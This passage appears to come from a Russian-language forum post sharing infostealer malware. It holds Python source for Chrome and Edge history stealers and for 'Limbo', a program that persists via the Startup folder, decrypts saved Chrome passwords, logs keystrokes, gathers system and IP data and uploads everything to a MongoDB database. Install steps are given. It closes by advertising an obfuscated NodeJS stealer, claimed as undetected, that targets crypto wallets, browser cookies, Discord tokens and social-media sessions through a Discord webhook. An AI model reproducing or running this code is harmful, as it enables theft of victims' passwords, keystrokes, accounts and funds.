# Create a zip file and add the bookmarks and history text files to it
zip_file_path = os.path.join(temp_dir, "Chrome_Data.zip")
with zipfile.ZipFile(zip_file_path, "w") as zip_file:
    zip_file.write(bookmarks_file_path, "Chrome Bookmarks.txt")
    zip_file.write(history_file_path, "Chrome History.txt")

# Delete the temporary text files
os.remove(bookmarks_file_path)
os.remove(history_file_path)

print(f"Zip file created: {zip_file_path}")

Edge Stealer​

Стилер работает по Edge, ориентирован на историю посещения.

edge_history.py​

import sqlite3
import tempfile
import zipfile
from pathlib import Path

def get_edge_history():
    history_file = Path.home() / 'AppData' / 'Local' / 'Microsoft' / 'Edge' / 'User Data' / 'Default' / 'History'
    if not history_file.exists():
        return []

    try:
        connection = sqlite3.connect(history_file)
        cursor = connection.cursor()
        cursor.execute("SELECT url, title FROM urls")
        results = cursor.fetchall()
        connection.close()
        return results
    except sqlite3.Error as error:
        return []

edge_history = get_edge_history()

# Get the path to the temporary directory
temp_dir = tempfile.gettempdir()

# Create the file path for edge_history.txt in the temporary directory
edge_file = Path(temp_dir) / "edge_history.txt"

if edge_history:
    with open(edge_file, "w", encoding="utf-8") as file:
        file.write("Edge History:\n")
        for url, title in edge_history:
            file.write(f"URL: {url}\n")
            file.write(f"Title: {title}\n\n")

    # Create the path for the ZIP archive
    zip_file = Path(temp_dir) / "Edge_Data.zip"

    # Create a ZIP archive and add the edge_history.txt file to it
    with zipfile.ZipFile(zip_file, "w") as zipf:
        zipf.write(edge_file, "edge_history.txt")

    # Delete the edge_history.txt file
    edge_file.unlink()

else:
    output_file = Path(temp_dir) / "browser_history.txt"

    with open(output_file, "w", encoding="utf-8") as file:
        file.write("Microsoft Edge is not found/used on this PC.")

Limbo​

Limbo - это мощный вредоносная программа, который можно использовать для сбора различных типов информации с компьютера пользователя.

В частности способен на:​

Сбор сохраненных паролей из Google Chrome
Запись истории поиска
Сбор нажатых клавиш
Сбор данных о компьютере пользователя, включая ОЗУ, ОС, ЦП и ГПУ
Поиск публичного IP-адреса пользователя и информации об этом

Установите Python https://www.python.org
Чтобы использовать, нужно будет установить несколько библиотек Python:

pip install wmi
pip install psutil
pip install requests
pip install pypiwin32
pip install pynput
pip install pymongo
pip install pycryptodome


После, нужно подключить базу данных MongoDB https://www.mongodb.com/
cluster = MongoClient() # Ваша база данных здесь

Применение:​

python limbo.py

limbo.py​

import os
import sys
import wmi
import json
import base64
import socket
import psutil
import requests
import platform
import win32crypt
from Cryptodome.Cipher import AES
import sqlite3
import shutil
import subprocess
from pynput import keyboard
from pynput.keyboard import Key
from pymongo import MongoClient
from datetime import timezone, datetime, timedelta

cluster = MongoClient() #your database here

#copy file for autostart
def copy_to_startup():
    current_path = os.path.realpath(__file__)
    current_file = os.path.basename(current_path)
    startup_path = os.path.join(os.environ["USERPROFILE"], "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
    if not os.path.exists(os.path.join(startup_path, current_file)):
        shutil.copy2(current_path, startup_path)
        print("Script copied to startup folder successfully!")
    else:
        print("Script already in startup folder.")

#computer information and network
def recon():
    db = cluster["keyloger"]
    collection = db["devices"]
    computer_name = platform.node()
    os = platform.system()
    os_version = platform.release()
    c = wmi.WMI()
    for cpu in c.Win32_Processor():
        print(f'CPU Name: {cpu.Name}')
    for gpu in c.Win32_VideoController():
        print(f'GPU Name: {gpu.Name}')
    for disk in c.Win32_DiskDrive():
        print(f'Disk Name: {disk.Caption}')
        total_space = int(disk.Size)
    ram = psutil.virtual_memory()
    print(f'Total RAM: {ram.total / (1024 ** 3):.2f} GB')
    response = requests.get("https://api.ipify.org")
    public_ip = response.text
    ip_info = requests.get(f"https://ipapi.co/{public_ip}/json/").json()
    country = ip_info['country_name']
    city = ip_info["city"]
    organization = ip_info["org"]
    post = {"Device": computer_name, "Operating system": os+" "+os_version, "Cpu": cpu.Name, "Gpu": gpu.Name, "Drive name": disk.Caption, "Drive size": f'{total_space / (1024 ** 3):.2f} GB', "Ram": f'{ram.total / (1024 ** 3):.2f} GB', "Public ip": public_ip, "Country": country, "City": city, "Provider": organization}
    collection.insert_one(post)

#password extractor
def fetching_encryption_key():
    local_computer_directory_path = os.path.join(
      os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
      "User Data", "Local State")
   
    with open(local_computer_directory_path, "r", encoding="utf-8") as f:
        local_state_data = f.read()
        local_state_data = json.loads(local_state_data)
 
    encryption_key = base64.b64decode(local_state_data["os_crypt"]["encrypted_key"])
   
    encryption_key = encryption_key[5:]
 
    return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
 
 
def password_decryption(password, encryption_key):
    try:
        iv = password[3:15]
        password = password[15:]
       
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
       
        return cipher.decrypt(password)[:-16].decode()
    except:
       
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return "No Passwords"
 
 
def main():
    print("Extracting passwords")
    db = cluster["keyloger"]
    collection = db["devices_passwords_logins"]
 
    key = fetching_encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Google", "Chrome", "User Data", "default", "Login Data")
    filename = "ChromePasswords.db"
    shutil.copyfile(db_path, filename)
   
    db = sqlite3.connect(filename)
    cursor = db.cursor()
   
    cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
    "order by date_last_used")
   
    for row in cursor.fetchall():
        login_page_url = row[1]
        user_name = row[2]
        decrypted_password = password_decryption(row[3], key)
        date_of_creation = row[4]
        last_usuage = row[5]
       
        if user_name or decrypted_password:
            post = {"login Url":login_page_url, "Username": user_name, "Password":decrypted_password}
            collection.insert_one(post)
       
        else:
            continue
    cursor.close()
    db.close()
   
    try:
        os.remove(filename)
    except:
        pass

#history extractor
def user_history_data():
    print("Extracting history data")
    db = cluster["keyloger"]
    collection = db["devices_history"]

    path = r"\AppData\Local\Google\Chrome\User Data\Default"

    os.chdir(os.path.join(os.environ["USERPROFILE"] + path))
    con = sqlite3.connect("History")
    cursor = con.cursor()

    for i in cursor.execute("SELECT * from urls"):
        post = {"website name": i[2], "website url": i[1]}
        collection.insert_one(post)
    print("Running keyloger")

#keylogs
keys = []

def on_press(key):
    global keys, host_name
    db = cluster["keyloger"]
    collection = db["devices"]
    keys.append(key)
    if key == Key.enter:
        data = str(keys).replace("'","").replace(",","").replace("[","").replace("]","").replace("<Key.space:  >"," ").replace("<Key.enter: <13>>","").replace("<Key.shift: <160>>", "")
        post = {"device": str(host_name), "text log": data}
        collection.insert_one(post)
        keys = []

def on_release(key):
    if key == keyboard.Key.esc:
        return False

#calling malware functions
copy_to_startup()
recon()
main()
user_history_data()
with keyboard.Listener(on_press=on_press,on_release=on_release) as listener:
    listener.join()
listener = keyboard.Listener(on_press=on_press,on_release=on_release)
listener.start()

Fewer Stealer FUD 0/66 с обфускацией и отправкой через discord webhook, построен на NodeJS https://nodejs.org/​

• Binance, Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi
• Trust, Metamask, BinanceChain, Phantom, TronLink, Ronin, Exodus, Coin98, Authenticator, MathWallet, YoroiWallet, GuardaWallet, JaxxxLiberty, Wombat, EVERWallet, KardiaChain, XDEFI, Nami, TerraStation, MartianAptos, TON, Keplr, CryptoCom, PetraAptos, OKX, Sollet, Sender, Sui, SuietSui, Braavos, FewchaMove, EthosSui, ArgentX, NiftyWallet, BraveWallet, EqualWallet, BitAppWallet, iWallet, AtomicWallet, MewCx, GuildWallet, SaturnWallet, HarmonyWallet, PaliWallet, BoltX, LiqualityWallet, MaiarDeFiWallet, TempleWallet, Metamask_Edge, Ronin_Edge, Yoroi_Edge, Authenticator_Edge, MetaMask_Opera
• Chrome, Edge, Brave, Opera, OperaGX, OperaNeon, Yandex
• Password / Cookie
• Discord Token Username, Phone number, Email, Billing, Nitro Status & Backup Codes
• Instagram Session stealer & validator
• Roblox Session stealer & validator
• Tiktok Session stealer & validator
• Telegram

Скачайте подходящую вам иконку icon.ico
Вставьте вебхук в 32932.js ==> const webhook3939 = "YOUR_DISCORD_WEBHOOK_PUT_HERE"
Запустите install.bat

​

​